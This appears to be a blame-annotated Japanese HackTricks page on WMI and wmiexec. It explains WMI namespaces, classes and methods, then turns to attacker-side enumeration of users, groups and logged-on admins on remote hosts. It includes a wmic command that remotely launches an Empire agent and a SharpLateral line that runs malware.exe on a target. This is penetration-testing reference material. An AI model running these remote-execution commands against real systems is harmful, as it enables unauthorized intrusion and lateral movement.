2022-08-13 23:06:40 +00:00
|
|
|
|
# WmicExec
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
* **サイバーセキュリティ会社**で働いていますか?**HackTricksで会社の広告を掲載**したいですか?または、**最新版のPEASSを入手**したり、**HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションです。
|
|
|
|
|
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
|
|
|
|
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか、**Twitterで**フォロー**してください [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
|
|
|
|
* **ハッキングのコツを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks)と[**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
## どのように機能するか
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
Wmiは、ユーザー名/(パスワード/ハッシュ)がわかっているホストでプロセスを開くことができます。その後、Wmiexecはwmiを使用して、実行するように要求された各コマンドを実行します(これがWmicexecがセミインタラクティブシェルを提供する理由です)。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
**dcomexec.py:** このスクリプトは、wmiexec.pyに似たセミインタラクティブシェルを提供しますが、異なるDCOMエンドポイント(ShellBrowserWindow DCOMオブジェクト)を使用します。現在、MMC20. Application、Shell Windows、およびShell Browser Windowオブジェクトをサポートしています。([こちら](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)から)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
## WMIの基本
|
2021-01-20 17:41:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### 名前空間
|
2021-01-20 17:41:14 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
WMIはディレクトリスタイルの階層に分かれており、\rootコンテナとその下の他のディレクトリがあります。これらの「ディレクトリパス」は名前空間と呼ばれます。\
|
|
|
|
|
名前空間のリスト:
|
2021-01-20 17:41:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
#Get Root namespaces
|
|
|
|
|
gwmi -namespace "root" -Class "__Namespace" | Select Name
|
|
|
|
|
|
|
|
|
|
#List all namespaces (you may need administrator to list all of them)
|
|
|
|
|
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace
|
|
|
|
|
|
|
|
|
|
#List namespaces inside "root\cimv2"
|
|
|
|
|
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
|
|
|
|
|
```
|
2023-12-26 22:04:57 +00:00
|
|
|
|
名前空間のクラスをリストするには:
|
2021-01-20 17:41:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
gwmwi -List -Recurse #If no namespace is specified, by default is used: "root\cimv2"
|
|
|
|
|
gwmi -Namespace "root/microsoft" -List -Recurse
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### **クラス**
|
2021-01-20 17:41:14 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
WMIクラス名(例:win32\_process)は、あらゆるWMIアクションの出発点です。常にクラス名と、それが位置するネームスペースを知る必要があります。\
|
|
|
|
|
`win32`で始まるクラスをリストアップ:
|
2021-01-20 17:41:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
Get-WmiObject -Recurse -List -class win32* | more #If no namespace is specified, by default is used: "root\cimv2"
|
|
|
|
|
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
クラスを呼び出す:
|
2021-01-20 17:41:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
#When you don't specify a namespaces by default is "root/cimv2"
|
|
|
|
|
Get-WmiObject -Class win32_share
|
|
|
|
|
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### メソッド
|
2021-01-20 17:41:14 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
WMIクラスには、実行可能な1つ以上の関数があります。これらの関数はメソッドと呼ばれます。
|
2021-01-20 23:53:30 +00:00
|
|
|
|
```bash
|
|
|
|
|
#Load a class using [wmiclass], leist methods and call one
|
|
|
|
|
$c = [wmiclass]"win32_share"
|
|
|
|
|
$c.methods
|
|
|
|
|
#Find information about the class in https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-share
|
|
|
|
|
$c.Create("c:\share\path","name",0,$null,"My Description")
|
|
|
|
|
#If returned value is "0", then it was successfully executed
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
#List methods
|
|
|
|
|
Get-WmiObject -Query 'Select * From Meta_Class WHERE __Class LIKE "win32%"' | Where-Object { $_.PSBase.Methods } | Select-Object Name, Methods
|
|
|
|
|
#Call create method from win32_share class
|
|
|
|
|
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
|
|
|
|
|
```
|
2023-12-26 22:04:57 +00:00
|
|
|
|
## WMI 列挙
|
2021-01-20 17:41:14 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
### WMI サービスの確認
|
2021-01-20 17:41:14 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
WMI サービスが実行中かどうかを確認する方法は次のとおりです:
|
2021-01-20 17:41:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
#Check if WMI service is running
|
|
|
|
|
Get-Service Winmgmt
|
|
|
|
|
Status Name DisplayName
|
|
|
|
|
------ ---- -----------
|
|
|
|
|
Running Winmgmt Windows Management Instrumentation
|
|
|
|
|
|
|
|
|
|
#From CMD
|
|
|
|
|
net start | findstr "Instrumentation"
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### システム情報
|
2021-01-20 17:41:14 +00:00
|
|
|
|
```bash
|
2023-07-07 23:42:27 +00:00
|
|
|
|
Get-WmiObject -ClassName win32_operatingsystem | select * | more
|
2021-01-20 17:41:14 +00:00
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### プロセス情報
|
|
|
|
|
```bash
|
|
|
|
|
Get-WmiObject win32_process | Select Name, Processid
|
2022-08-13 23:06:40 +00:00
|
|
|
|
```
|
2023-12-26 22:04:57 +00:00
|
|
|
|
攻撃者の観点から、WMIはシステムやドメインに関する機密情報を列挙する上で非常に価値があります。
|
2023-07-07 23:42:27 +00:00
|
|
|
|
```
|
|
|
|
|
wmic computerystem list full /format:list
|
|
|
|
|
wmic process list /format:list
|
|
|
|
|
wmic ntdomain list /format:list
|
|
|
|
|
wmic useraccount list /format:list
|
|
|
|
|
wmic group list /format:list
|
|
|
|
|
wmic sysaccount list /format:list
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
|
|
|
|
|
2021-01-03 18:40:02 +00:00
|
|
|
|
```bash
|
2023-07-07 23:42:27 +00:00
|
|
|
|
Get-WmiObject Win32_Processor -ComputerName 10.0.0.182 -Credential $cred
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## **手動リモートWMIクエリ**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
例えば、リモートマシン上のローカル管理者を非常に慎重に発見する方法は以下の通りです(domainはコンピュータ名であることに注意してください):
|
|
|
|
|
|
|
|
|
|
{% code overflow="wrap" %}
|
2023-07-07 23:42:27 +00:00
|
|
|
|
```bash
|
|
|
|
|
wmic /node:ordws01 path win32_groupuser where (groupcomponent="win32_group.name=\"administrators\",domain=\"ORDWS01\"")
|
|
|
|
|
```
|
2023-12-26 22:04:57 +00:00
|
|
|
|
{% endcode %}
|
|
|
|
|
|
|
|
|
|
管理者を探しているときに便利なワンライナーは、誰がマシンにログオンしているかを確認することです:
|
|
|
|
|
```bash
|
2023-07-07 23:42:27 +00:00
|
|
|
|
wmic /node:ordws01 path win32_loggedonuser get antecedent
|
|
|
|
|
```
|
2023-12-26 22:04:57 +00:00
|
|
|
|
`wmic` はテキストファイルからノードを読み取り、それら全てにコマンドを実行することもできます。ワークステーションのテキストファイルがある場合:
|
2023-07-07 23:42:27 +00:00
|
|
|
|
```
|
|
|
|
|
wmic /node:@workstations.txt path win32_loggedonuser get antecedent
|
|
|
|
|
```
|
2023-12-26 22:04:57 +00:00
|
|
|
|
**WMIを介してリモートでプロセスを作成し、Empireエージェントを実行します:**
|
2023-07-07 23:42:27 +00:00
|
|
|
|
```bash
|
|
|
|
|
wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**"
|
|
|
|
|
```
|
2023-12-26 22:04:57 +00:00
|
|
|
|
正常に実行されたことがわかります(ReturnValue = 0)。そして1秒後に、Empireリスナーがそれを捕捉します。プロセスIDはWMIが返したものと同じです。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
この情報はここから抜粋されました:[https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
## 自動ツール
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
* [**SharpLateral**](https://github.com/mertdas/SharpLateral):
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
{% code overflow="wrap" %}
|
|
|
|
|
```bash
|
|
|
|
|
SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
|
|
|
|
|
```
|
|
|
|
|
<details>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-12-26 22:04:57 +00:00
|
|
|
|
* **サイバーセキュリティ会社**で働いていますか?**HackTricksで会社の広告を掲載**したいですか?または、**最新版のPEASSを入手**したり、**HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください。
|
|
|
|
|
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手してください。
|
|
|
|
|
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか**、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
|
|
|
|
|
* **ハッキングのコツを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|